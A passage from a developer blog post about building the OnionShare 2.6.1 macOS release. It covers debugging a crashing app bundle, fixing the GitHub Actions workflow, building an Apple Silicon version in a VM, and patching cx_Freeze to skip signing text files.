</pre></div>
<p>It worked! Okay, let's try the GUI...</p>
<div class="hll"><pre><span></span>./onionshare<span class="w"> </span>-v
</pre></div>
<p>It worked too!</p>
<p><img src="mac-build-onionshare.png" alt="OnionShare binary successfully running"></p>
<p>Okay, this is great. This means that the problem is turning it into an app bundle, not the binary itself.</p>
<h3 id="debugging-the-app-bundle">Debugging the app bundle</h3><p>Next, I'll try delete the app bundle from the previous build and then run the script to build the app bundle and make sure it still crashes, just to be sure:</p>
<pre><code>% rm -rf build/OnionShare.app
% poetry run python ./setup-freeze.py bdist_mac
running bdist_mac
running build_exe
creating directory /Users/user/code/onionshare/desktop/build/exe.macosx-10.9-universal2-3.11/lib
copying /Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/cx_Freeze/bases/lib/Python -> /Users/user/code/onionshare/desktop/build/exe.macosx-10.9-universal2-3.11/lib/Python
copying /Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/cx_Freeze/bases/console-cpython-311-darwin -> /Users/user/code/onionshare/desktop/build/exe.macosx-10.9-universal2-3.11/onionshare
--snip--
</code></pre>
<p>It finished. I'll try running the CLI binary from the app bundle first:</p>
<pre><code>% ./build/OnionShare.app/Contents/MacOS/onionshare-cli
╭───────────────────────────────────────────╮
│ * ▄▄█████▄▄ * │
│ ▄████▀▀▀████▄ * │
│ ▀▀█▀ ▀██▄ │
│ * ▄█▄ ▀██▄ │
│ ▄█████▄ ███ -+- │
│ ███ ▀█████▀ │
│ ▀██▄ ▀█▀ │
│ * ▀██▄ ▄█▄▄ * │
│ * ▀████▄▄▄████▀ │
│ ▀▀█████▀▀ │
│ -+- * │
│ ▄▀▄ ▄▀▀ █ │
│ █ █ ▀ ▀▄ █ │
│ █ █ █▀▄ █ ▄▀▄ █▀▄ ▀▄ █▀▄ ▄▀▄ █▄▀ ▄█▄ │
│ ▀▄▀ █ █ █ ▀▄▀ █ █ ▄▄▀ █ █ ▀▄█ █ ▀▄▄ │
│ │
│ v2.6.1 │
│ │
│ https://onionshare.org/ │
╰───────────────────────────────────────────╯
usage: onionshare-cli [-h] [--receive] [--website] [--chat] [--local-only] [--connect-timeout SECONDS] [--config FILENAME] [--persistent FILENAME]
[--title TITLE] [--public] [--auto-start-timer SECONDS] [--auto-stop-timer SECONDS] [--no-autostop-sharing] [--data-dir data_dir]
[--webhook-url webhook_url] [--disable-text] [--disable-files] [--disable_csp] [--custom_csp custom_csp] [-v]
[filename ...]
positional arguments:
filename List of files or folders to share
options:
-h, --help show this help message and exit
--receive Receive files
--snip--
</code></pre>
<p>This worked. Now, the desktop version:</p>
<pre><code>% ./build/OnionShare.app/Contents/MacOS/onionshare
zsh: segmentation fault ./build/OnionShare.app/Contents/MacOS/onionshare
</code></pre>
<p>This crashed. So most likely this has something to do with how PySide2 (which is what the desktop uses to display the GUI) is being packaged in the app bundle.</p>
<p>Since I know that the frozen app works when I built it, but not when I packaged it in an app bundle, I should compare the two and see what's different. Here are the files in the working build:</p>
<pre><code>% ls -l build/exe.macosx-10.9-universal2-3.11
total 304
-rw-r--r-- 1 user staff 35285 Oct 2 2022 LICENSE
-rw-r--r-- 1 user staff 3211 Sep 28 14:54 frozen_application_license.txt
drwxr-xr-x 249 user staff 7968 Oct 9 20:54 lib
-rwxr-xr-x 1 user staff 54736 Sep 28 14:54 onionshare
-rwxr-xr-x 1 user staff 54736 Sep 28 14:54 onionshare-cli
</code></pre>
<p>And here are the files in the broken build (the app bundle):</p>
<pre><code>% ls -l build/OnionShare.app/Contents/MacOS
total 224
lrwxr-xr-x 1 user staff 16 Oct 9 20:54 lib -> ../Resources/lib
-rwxr-xr-x 1 user staff 54736 Oct 9 20:54 onionshare
-rwxr-xr-x 1 user staff 54736 Oct 9 20:54 onionshare-cli
</code></pre>
<p>In the working build, the <code>lib</code> folder is in the same folder as the <code>onionshare</code> binary, but in the broken build, <code>lib</code> is a symbolic link to <code>../Resources/lib</code>. Maybe it's choking on the symlink? Let's see what happens if I remove the symlink:</p>
<pre><code>% cd build/OnionShare.app/Contents/MacOS
% rm lib
% mv ../Resources/lib .
% ./onionshare
zsh: segmentation fault ./onionshare
</code></pre>
<p>It still crashes, so that's not it. After a cursory glance, the <code>lib</code> folders in the working and broken builds appear to be the same. But just to be safe, let me try copying the lib folder from the working build into the broken build and see if that fixes things.</p>
<pre><code>% rm -rf lib
% cp -r ../../../exe.macosx-10.9-universal2-3.11/lib .
% ./onionshare
╭───────────────────────────────────────────╮
│ * ▄▄█████▄▄ * │
│ ▄████▀▀▀████▄ * │
│ ▀▀█▀ ▀██▄ │
│ * ▄█▄ ▀██▄ │
│ ▄█████▄ ███ -+- │
--snip--
</code></pre>
<p>It worked! Let me try adding the symlink back and see if it still works...</p>
<pre><code>% mv lib ../Resources
% ln -s ../Resources/lib lib
% ./onionshare
╭───────────────────────────────────────────╮
│ * ▄▄█████▄▄ * │
│ ▄████▀▀▀████▄ * │
│ ▀▀█▀ ▀██▄ │
│ * ▄█▄ ▀██▄ │
│ ▄█████▄ ███ -+- │
--snip--
</code></pre>
<p>Yup, still works!</p>
<p>So I think I have one potential way forward: When building the app bundle, I can just copy the <code>lib</code> folder from <code>exe.macosx-10.9-universal2-3.11</code> into <code>OnionShare.app</code>. That feels hacky, but I do see any other obvious solutions, so I'm going for it.</p>
<h3 id="putting-it-all-together">Putting it all together</h3><p>I'm going to start over from scratch and make sure this all works as intended. First, I'm going to delete the <code>build</code> folder, and rebuild the app bundle:</p>
<div class="hll"><pre><span></span>rm<span class="w"> </span>-rf<span class="w"> </span>build
poetry<span class="w"> </span>run<span class="w"> </span>python<span class="w"> </span>./setup-freeze.py<span class="w"> </span>bdist_mac
</pre></div>
<p>I noticed that after this command finished, the new <code>build</code> folder had both <code>exe.macos-10.9-universal2-3.11</code> and <code>OnionShare.app</code> in it, which means that I don't need to manually run <code>poetry run python ./setup-freeze.py build</code> first.</p>
<p>Next, I will delete the broken <code>lib</code> folder from the app bundle, and movethe working <code>lib</code> folder into its place:</p>
<div class="hll"><pre><span></span>rm<span class="w"> </span>-rf<span class="w"> </span>build/OnionShare.app/Contents/Resources/lib
mv<span class="w"> </span>build/exe.macosx-10.9-universal2-3.11/lib<span class="w"> </span>build/OnionShare.app/Contents/Resources/
</pre></div>
<p>Next, I'll run the last step, the cleanup script:</p>
<pre><code>% poetry run python ./scripts/build-macos.py cleanup-build
> Delete unused Qt Frameworks
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/Qt/lib/QtMultimediaQuick.framework
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/Qt/lib/QtQuickControls2.framework
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/QtQuickControls2.abi3.so
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/QtQuickControls2.pyi
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/Qt/lib/QtQuickParticles.framework
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/Qt/lib/QtRemoteObjects.framework
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/QtRemoteObjects.abi3.so
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/QtRemoteObjects.pyi
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/lib/PySide6/Qt/lib/Qt3DInput.framework
--snip--
> Delete more unused PySide6 stuff to save space
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/Designer.app
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/glue
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/include
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/lupdate
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/Qt/qml
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/Assistant.app
Deleted: /Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/Resources/lib/PySide6/Linguist.app
--snip--
> Freed 1233 mb
</code></pre>
<p>Nice, it deleted an extra 1.2GB of data that we hopefully don't need to distribute. I'll try running it to make sure everything works:</p>
<pre><code>./build/OnionShare.app/Contents/MacOS/onionshare
</code></pre>
<p>Yup! It works great.</p>
<h3 id="fixing-the-github-actions-build">Fixing the GitHub Actions build</h3><p>As I described in <a href="https://web.archive.org/web/20231028233436/https://micahflee.com/2023/09/what-goes-into-making-an-onionshare-release-part-2/">part 2</a>, whenever a commit gets pushed into a PR branch in the OnionShare project, there are GitHub Actions workflows that try to automatically build Windows and Mac binaries. When making a release, I'd like to download this Mac binary, make sure it works, and codesign it.</p>
<p>Here's the "Build OnionShare" step in the GitHub Actions workflow, in the <code>build-mac-intel</code> job:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Build OnionShare</span>
<span class="w"> </span><span class="nt">run</span><span class="p">:</span><span class="w"> </span><span class="p p-Indicator">|</span>
<span class="w"> </span><span class="no">cd desktop</span>
<span class="w"> </span><span class="no">/Library/Frameworks/Python.framework/Versions/3.10/bin/poetry run python ./setup-freeze.py build</span>
<span class="w"> </span><span class="no">/Library/Frameworks/Python.framework/Versions/3.10/bin/poetry run python ./setup-freeze.py bdist_mac</span>
<span class="w"> </span><span class="no">/Library/Frameworks/Python.framework/Versions/3.10/bin/poetry run python ./scripts/build-macos.py cleanup-build</span>
</pre></div>
<p>I've updated it to this instead, basically to follow the steps I just manually performed:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Build OnionShare</span>
<span class="w"> </span><span class="nt">run</span><span class="p">:</span><span class="w"> </span><span class="p p-Indicator">|</span>
<span class="w"> </span><span class="no">cd desktop</span>
<span class="w"> </span><span class="no">/Library/Frameworks/Python.framework/Versions/3.10/bin/poetry run python ./setup-freeze.py bdist_mac</span>
<span class="w"> </span><span class="no">rm -rf build/OnionShare.app/Contents/Resources/lib</span>
<span class="w"> </span><span class="no">mv build/exe.macosx-10.9-universal2-3.10/lib build/OnionShare.app/Contents/Resources/</span>
<span class="w"> </span><span class="no">/Library/Frameworks/Python.framework/Versions/3.10/bin/poetry run python ./scripts/build-macos.py cleanup-build</span>
</pre></div>
<p>Notice that this time, the working <code>lib</code> folder is in a folder called <code>exe.macos-11.0-universal2-3.10</code> instead of <code>exe.macos-11.0-universal2-3.11</code> (<code>3.10</code> instead of <code>3.11</code>), because at the moment the GitHub Actions workflow is still using Python 3.10 -- I'll update that to 3.11 soon, but first I want to see if this works.</p>
<p>I committed my change to the GitHub actions workflow and pushed it to a <a href="https://github.com/onionshare/onionshare/pull/1779">PR branch</a> on GitHub, and waited for GitHub Actions to kick in and build the Intel Mac binary.</p>
<h3 id="testing-the-intel-mac-binary-from-github-actions">Testing the Intel Mac binary from GitHub Actions</h3><p>The GitHub Actions workflow generated artifacts, including <code>mac-build</code> one:</p>
<p><img src="github-actions-artifacts.png" alt="Artifacts generated by GitHub Actions"></p>
<p>I downloaded all <code>mac-build.zip</code> and copied it to my Intel Mac build machine. From there, I extracted it and tried running the OnionShare app, and it worked!</p>
<p><img src="macos-onionshare.png" alt="OnionShare app bundle from GitHub Actions running in macOS"></p>
<h2 id="updating-dependencies-again">Updating dependencies again</h2><p>I'm making great progress! I think now is a good time to pause and update all of the dependencies one final time. I'll start with the Python deps:</p>
<pre><code>cd cli
poetry update
cd ../desktop
poetry update
cd ../docs
poetry update
</code></pre>
<p>Next, I need to make sure Snapcraft and Flatpak use these latest dependencies too. I won't have to make any changes for Snapcraft since it just pip installs the latest versions, but I do need to update the Flatpak manifest to use these new versions.</p>
<p>I did this using the patched <code>flatpak-poetry-generator.py</code> script from flatpak-builder-tools, just as I had described in part 2.</p>
<p>Next, I want to update Python across the board to 3.11.6. I updated the instructions in <code>desktop/README.md</code> to tell people to install the latest version 3.11, and I also updated the version in the GitHub Actions workflow for both <code>build-win64</code> and <code>build-mac-intel</code>.</p>
<h2 id="adventures-in-arm64-and-github-actions">Adventures in ARM64 and GitHub Actions</h2><p>Good thing this release is taking so long to finish, because at the beginning of October, <a href="https://web.archive.org/web/20231028233436/https://github.blog/2023-10-02-introducing-the-new-apple-silicon-powered-m1-macos-larger-runner-for-github-actions/">GitHub announced support</a> for M1 macOS runners, so now I can make the GitHub Actions workflow build Apple Silicon binaries as well!</p>
<p>Or, well, that's what I thought. I spent about an hour and a half of working on this. I made a new build-mac-arm64 job in my GitHub Actions workflow and made it run on it the <code>macos-13 runner</code>, got it working and creating app bundles, and even started testing it. That's when I realized that the <code>macos-13</code> runner is still using an Intel processor, and the GitHub blog post I read about M1 runners was talking about "large runners" which are different than "standard GitHub-hosted runners", and are only available with paid GitHub plans. The OnionShare organization is using a free plan, so it's not actually available unless we pay for it.</p>
<p>We could maybe pay for a paid GitHub organization plan, but that's a separate topic. (Or if you're from GitHub and can donate Team plans to open source projects, we'd happily accept.)</p>
<p>So I <code>git reset</code> my branch back to before I started making the <code>build-mac-arm64</code> job and force pushed, reverting all my work. Maybe some day. But in the mean time, it looks like I'll have to manually build the Apple Silicon version of OnionShare, and also manually merge it with the Intel version to make a universal2 app bundle.</p>
<h2 id="building-onionshare-for-apple-silicon">Building OnionShare for Apple Silicon</h2><p>I have a MacBook Pro with an M1 processor which I can use to make the ARM64 (a.k.a. Apple Silicon) build. But I use this computer on a regular basis and I have all sorts of development environment relics installed, and I'd prefer a clean environment for creating a release build. Plus, I have Rosetta installed on this computer, which allows me to run Intel binaries even though I have an ARM64 processor--I specifically <em>don't</em> want Rosetta installed in my ARM64 development environment (or at least test environment) so I can make sure the final build actually works on ARM64 and isn't actually using Intel in the background.</p>
<p>So, I opened the open source virtualization software <a href="https://mac.getutm.app/">UTM</a> and installed a new macOS Sonoma VM. UTM is great, and is the only free VM software that works with Apple Silicon right now, there for macOS isn't support for things shared clipboard, changing the resolution, and not very good support for shared folders.</p>
<h3 id="setting-up-the-development-environment">Setting up the development environment</h3><p>Once I finished installing my new macOS VM, I set up an OnionShare development environment by following the <a href="https://github.com/onionshare/onionshare/blob/main/desktop/README.md">instructions</a> in <code>desktop/README.md</code>:</p>
<ul>
<li>When I try running <code>git clone</code> to clone the source code the first time, it prompts me to install the Xcode command line developer tools.</li>
<li>After cloning the OnionShare git repo, I checkout the <code>release-2.6.1</code> branch.</li>
<li>I downloaded and installed Python 3.11.6 from python.org.</li>
<li>I installed Poetry with <code>pip3 install poetry</code>. I also edited <code>~/.zshrc</code> and this line, so that Python 3.11's <code>bin</code> dir is in the path: <code>export PATH=$PATH:/Library/Frameworks/Python.framework/Versions/3.11/bin</code>.</li>
<li>Installed Poetry dependencies by running: <code>cd desktop; poetry install</code>.</li>
<li>Downloaded Tor binaries from Tor Browser by running: <code>poetry run python ./scripts/get-tor.py macos</code>.</li>
</ul>
<p>When I did this last step I hit an error. The <code>get-tor.py</code> script was trying to subprocess out to <code>gpg</code>, but I didn't have it installed. So, I installed Homebrew and then install GnuPG with <code>brew install gnupg</code>, and then tried it again. This time it worked. Then I moved on to the rest of the steps:</p>
<ul>
<li>I installed Go from <a href="https://go.dev/dl/">https://go.dev/dl/</a>, making sure to use the ARM64 version. I downloaded <code>go1.21.3.darwin-arm64.pkg</code>.</li>
<li>I compiled the pluggable transports (for ARM64) by running:<div class="hll"><pre><span></span>./scripts/build-pt-obfs4proxy.sh
./scripts/build-pt-snowflake.sh
./scripts/build-pt-meek.sh
</pre></div>
</li>
<li>Finally, I ran OnionShare from the source tree by running <code>poetry run onionshare -v</code>, just to make sure it's all working. Nice, the OnionShare window popped up.</li>
</ul>
<p>With this, my VM is set up for OnionShare development. Now I need to create an app bundle. To remind myself how to do that I looked at the GitHub Actions workflow for <code>build-mac-intel</code> and remembered that there's this step too:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Install cx_Freeze/PySide6 build dependencies</span>
<span class="w"> </span><span class="nt">run</span><span class="p">:</span><span class="w"> </span><span class="p p-Indicator">|</span>
<span class="w"> </span><span class="no">brew install libiodbc</span>
<span class="w"> </span><span class="no">cd ~/Downloads</span>
<span class="w"> </span><span class="no">curl -O -L https://github.com/PostgresApp/PostgresApp/releases/download/v2.6.5/Postgres-2.6.5-14.dmg</span>
<span class="w"> </span><span class="no">hdiutil attach Postgres-2.6.5-14.dmg</span>
<span class="w"> </span><span class="no">cp -r /Volumes/Postgres-2.6.5-14/Postgres.app /Applications/</span>
<span class="w"> </span><span class="no">hdiutil detach /Volumes/Postgres-2.6.5-14</span>
</pre></div>
<p>So before building the app bundle:</p>
<ul>
<li>Installed <code>libiodbc</code> by running: <code>brew install libiodbc</code>.</li>
<li>Downloaded <code>Postgres-2.6.5-14.dmg</code>, opened it, and dragged it to Applications.</li>
</ul>
<h3 id="building-the-app-bundle">Building the app bundle</h3><p>Here's the "Build OnionShare step" from the GitHub Actions workflow:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Build OnionShare</span>
<span class="w"> </span><span class="nt">run</span><span class="p">:</span><span class="w"> </span><span class="p p-Indicator">|</span>
<span class="w"> </span><span class="no">cd desktop</span>
<span class="w"> </span><span class="no">/Library/Frameworks/Python.framework/Versions/3.11/bin/poetry run python ./setup-freeze.py bdist_mac</span>
<span class="w"> </span><span class="no">rm -rf build/OnionShare.app/Contents/Resources/lib</span>
<span class="w"> </span><span class="no">mv build/exe.macosx-10.9-universal2-3.11/lib build/OnionShare.app/Contents/Resources/</span>
<span class="w"> </span><span class="no">/Library/Frameworks/Python.framework/Versions/3.11/bin/poetry run python ./scripts/build-macos.py cleanup-build</span>
</pre></div>
<p>So I simply have to run these manually:</p>
<pre><code>% poetry run python ./setup-freeze.py bdist_mac
running bdist_mac
running build_exe
--snip--
copying /Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/PySide6/Qt/plugins/sqldrivers/libqsqlodbc.dylib -> /Users/user/code/onionshare/desktop/build/exe.macosx-10.9-universal2-3.11/lib/PySide6/Qt/plugins/sqldrivers/libqsqlodbc.dylib
copying /usr/local/opt/libiodbc/lib/libiodbc.2.dylib -> /Users/user/code/onionshare/desktop/build/exe.macosx-10.9-universal2-3.11/lib/libiodbc.2.dylib
error: [Errno 2] No such file or directory: '/usr/local/opt/libiodbc/lib/libiodbc.2.dylib'
</code></pre>
<p>Hmm, it can't find <code>libiodbc.2.dylib</code>, but I did install the <code>libiodbc</code> package.</p>
<p>Ahh, it looks like Homebrew put it in <code>/opt/homebrew/opt/libiodbc/</code>, but my build script is looking for it in <code>/usr/local/opt/libiodbc/</code>. I can fix that by creating a symlink and trying again:</p>
<pre><code>% sudo mkdir /usr/local/opt
% sudo ln -s /opt/homebrew/opt/libiodbc /usr/local/opt/libiodbc
% poetry run python ./setup-freeze.py bdist_mac
running bdist_mac
running build_exe
--snip--
Setting relative_reference_path for: Mach-O File: /Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/cx_Freeze/initscripts/frozen_application_license.txt
Resolved rpath:
Loaded libraries:
Applying AdHocSignature
/Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/frozen_application_license.txt: No such file or directory
error: [Errno 2] No such file or directory: '/Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/frozen_application_license.txt'
</code></pre>
<p>Nice, that problem is fixed, but now I'm hitting another.</p>
<p><code>frozen_application_license.txt</code> is a license file that cx_Freeze adds to binaries it creates, but for some reason it didn't copy it into the app bundle. But even if it did, the output says it's trying to sign that file, and in macOS you can't sign text files, only Mach-O binaries, so it shouldn't be doing that. What's going on?</p>
<h3 id="fixing-cx-freeze">Fixing cx_Freeze</h3><p>I spent some time searching the internet and reading issues in the <a href="https://github.com/marcelotduarte/cx_Freeze">cx_Freeze GitHub repo</a>, but still didn't come to a firm solution. So I decided to dig into the source code and see what's going on. In cx_Freeze code's <a href="https://github.com/marcelotduarte/cx_Freeze/blob/main/cx_Freeze/command/bdist_mac.py"><code>cx_Freeze/command/bdist_mac.py</code></a>, I see a few relevant functions a function called <code>set_relative_reference_paths</code>. Here's the code for that function:</p>
<div class="hll"><pre><span></span><span class="k">def</span> <span class="nf">set_relative_reference_paths</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">build_dir</span><span class="p">:</span> <span class="nb">str</span><span class="p">,</span> <span class="n">bin_dir</span><span class="p">:</span> <span class="nb">str</span><span class="p">):</span>
<span class="w"> </span><span class="sd">"""Make all the references from included Mach-O files to other included</span>
<span class="sd"> Mach-O files relative.</span>
<span class="sd"> """</span>
<span class="n">darwin_file</span><span class="p">:</span> <span class="n">DarwinFile</span>
<span class="k">for</span> <span class="n">darwin_file</span> <span class="ow">in</span> <span class="bp">self</span><span class="o">.</span><span class="n">darwin_tracker</span><span class="p">:</span>
<span class="c1"># get the relative path to darwin_file in build directory</span>
<span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">"Setting relative_reference_path for: </span><span class="si">{</span><span class="n">darwin_file</span><span class="si">}</span><span class="s2">"</span><span class="p">)</span>
<span class="n">relative_copy_dest</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">relpath</span><span class="p">(</span>
<span class="n">darwin_file</span><span class="o">.</span><span class="n">getBuildPath</span><span class="p">(),</span> <span class="n">build_dir</span>
<span class="p">)</span>
<span class="c1"># figure out directory where it will go in binary directory for</span>
<span class="c1"># .app bundle, this would be the Content/MacOS subdirectory in</span>
<span class="c1"># bundle. This is the file that needs to have its dynamic load</span>
<span class="c1"># references updated.</span>
<span class="n">file_path_in_bin_dir</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">bin_dir</span><span class="p">,</span> <span class="n">relative_copy_dest</span><span class="p">)</span>
<span class="c1"># for each file that this darwin_file references, update the</span>
<span class="c1"># reference as necessary; if the file is copied into the binary</span>
<span class="c1"># package, change the reference to be relative to @executable_path</span>
<span class="c1"># (so an .app bundle will work wherever it is moved)</span>
<span class="k">for</span> <span class="n">reference</span> <span class="ow">in</span> <span class="n">darwin_file</span><span class="o">.</span><span class="n">getMachOReferenceList</span><span class="p">():</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">reference</span><span class="o">.</span><span class="n">is_copied</span><span class="p">:</span>
<span class="c1"># referenced file not copied -- assume this is a system</span>
<span class="c1"># file that will also be present on the user's machine,</span>
<span class="c1"># and do not change reference</span>
<span class="k">continue</span>
<span class="c1"># this is the reference in the machO file that needs to be</span>
<span class="c1"># updated</span>
<span class="n">raw_path</span> <span class="o">=</span> <span class="n">reference</span><span class="o">.</span><span class="n">raw_path</span>
<span class="n">ref_target_file</span><span class="p">:</span> <span class="n">DarwinFile</span> <span class="o">=</span> <span class="n">reference</span><span class="o">.</span><span class="n">target_file</span>
<span class="c1"># this is where file copied in build dir</span>
<span class="n">abs_build_dest</span> <span class="o">=</span> <span class="n">ref_target_file</span><span class="o">.</span><span class="n">getBuildPath</span><span class="p">()</span>
<span class="n">rel_build_dest</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">relpath</span><span class="p">(</span><span class="n">abs_build_dest</span><span class="p">,</span> <span class="n">build_dir</span><span class="p">)</span>
<span class="n">exe_path</span> <span class="o">=</span> <span class="sa">f</span><span class="s2">"@executable_path/</span><span class="si">{</span><span class="n">rel_build_dest</span><span class="si">}</span><span class="s2">"</span>
<span class="n">changeLoadReference</span><span class="p">(</span>
<span class="n">file_path_in_bin_dir</span><span class="p">,</span>
<span class="n">oldReference</span><span class="o">=</span><span class="n">raw_path</span><span class="p">,</span>
<span class="n">newReference</span><span class="o">=</span><span class="n">exe_path</span><span class="p">,</span>
<span class="n">VERBOSE</span><span class="o">=</span><span class="kc">False</span><span class="p">,</span>
<span class="p">)</span>
<span class="n">applyAdHocSignature</span><span class="p">(</span><span class="n">file_path_in_bin_dir</span><span class="p">)</span>
</pre></div>
<p>This is where the problem is -- remember, this is part of the error message:</p>
<pre><code>Setting relative_reference_path for: Mach-O File: /Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/cx_Freeze/initscripts/frozen_application_license.txt
</code></pre>
<p>This same file also includes a function called <code>set_absolute_reference_paths</code>, and that function has some logic to specifically skip <code>txt</code> and <code>zip</code> files, and I think some similar logic here might fix my problem. So I forked cx_Freeze and patched the code. Here's my patch:</p>
<div class="hll"><pre><span></span><span class="gh">diff --git a/cx_Freeze/command/bdist_mac.py b/cx_Freeze/command/bdist_mac.py</span>
<span class="gh">index 44cb03e..0cee824 100644</span>
<span class="gd">--- a/cx_Freeze/command/bdist_mac.py</span>
<span class="gi">+++ b/cx_Freeze/command/bdist_mac.py</span>
<span class="gu">@@ -332,6 +332,10 @@ class BdistMac(Command):</span>
<span class="w"> </span> darwin_file: DarwinFile
<span class="w"> </span> for darwin_file in self.darwin_tracker:
<span class="gi">+ # Skip text files</span>
<span class="gi">+ if str(darwin_file.path).endswith(".txt"):</span>
<span class="gi">+ continue</span>
<span class="gi">+</span>
<span class="w"> </span> # get the relative path to darwin_file in build directory
<span class="w"> </span> print(f"Setting relative_reference_path for: {darwin_file}")
<span class="w"> </span> relative_copy_dest = os.path.relpath(
</pre></div>
<p>I ran the build again, and this time it worked! At least, until it hit this error:</p>
<pre><code>% poetry run python ./setup-freeze.py bdist_mac
running bdist_mac
running build_exe
--snip--
Setting relative_reference_path for: Mach-O File: /Users/user/code/onionshare/LICENSE
Resolved rpath:
Loaded libraries:
Applying AdHocSignature
/Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/LICENSE: No such file or directory
error: [Errno 2] No such file or directory: '/Users/user/code/onionshare/desktop/build/OnionShare.app/Contents/MacOS/LICENSE'
</code></pre>
<p>The <code>LICENSE</code> file is OnionShare's license, and it gets included in the app bundle. It's not skipping it because it's not a <code>.txt</code> file. So, I'm just going to go ahead and rename it to <code>LICENSE.txt</code>, and also update <code>desktop/setup-freeze.py</code> to include <code>LICENSE.txt</code> instead of <code>LICENSE</code>. Let's see if that does the trick.</p>
<p>It finished without errors! Almost there. Before moving on, I <a href="https://github.com/marcelotduarte/cx_Freeze/pull/2102">opened a PR</a> in the cx_Freeze project with my patch.</p>
<h3 id="finishing-the-build">Finishing the build</h3><p>Again, here's the full "Build OnionShare" step in the GitHub Actions workflow:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Build OnionShare</span>
<span class="w"> </span><span class="nt">run</span><span class="p">:</span><span class="w"> </span><span class="p p-Indicator">|</span>
<span class="w"> </span><span class="no">cd desktop</span>
<span class="w"> </span><span class="no">/Library/Frameworks/Python.framework/Versions/3.11/bin/poetry run python ./setup-freeze.py bdist_mac</span>
<span class="w"> </span><span class="no">rm -rf build/OnionShare.app/Contents/Resources/lib</span>
<span class="w"> </span><span class="no">mv build/exe.macosx-10.9-universal2-3.11/lib build/OnionShare.app/Contents/Resources/</span>
<span class="w"> </span><span class="no">/Library/Frameworks/Python.framework/Versions/3.11/bin/poetry run python ./scripts/build-macos.py cleanup-build</span>
</pre></div>
<p>I successfully ran <code>poetry run python ./setup-freeze.py bdist_mac</code>, and now I need to run the rest of the commands:</p>
<pre><code>% rm -rf build/OnionShare.app/Contents/Resources/lib
% mv build/exe.macosx-10.9-universal2-3.11/lib build/OnionShare.app/Contents/Resources/
% poetry run python ./scripts/build-macos.py cleanup-build
--snip--
> Freed 1233 mb
</code></pre>
<p>No problems yet. Can I run the binary?</p>
<p><img src="mac-vm-onionshare.png" alt="Running the OnionShare app bundle in the Mac VM"></p>
<p>I can! I've created a working Apple Silicon binary in <code>build/OnionShare.app</code>.</p>
<h2 id="merging-app-bundles-into-a-universal2-mac-app-bundle">Merging app bundles into a universal2 Mac app bundle</h2><p>My original plan for this release was to make two version for Mac, Intel and Apple Silicon. However, I'm <em>sooo close</em> I might as well just go the final yard and merge these two app bundles into a single universal2 app bundle.</p>
<p>In macOS, Mach-O binaries are compiled for a specific architecture, like <code>arm64</code> or <code>x86_64</code>. Using a program called <code>lipo</code> you can merge binaries of different architectures into the same file so that it will run on either architecture--this is called universal2 (the original universal format for Mach-O binaries that had both PowerPC and Intel architectures, from back in the day).</p>
<p>According to Apple's <a href="https://developer.apple.com/documentation/apple-silicon/building-a-universal-macos-binary">documentation</a>, if you have an Intel binary called <code>x86_app</code> and an ARM64 binary called <code>arm_app</code>, you can create a universal2 binary called <code>universal_app</code> with this command:</p>
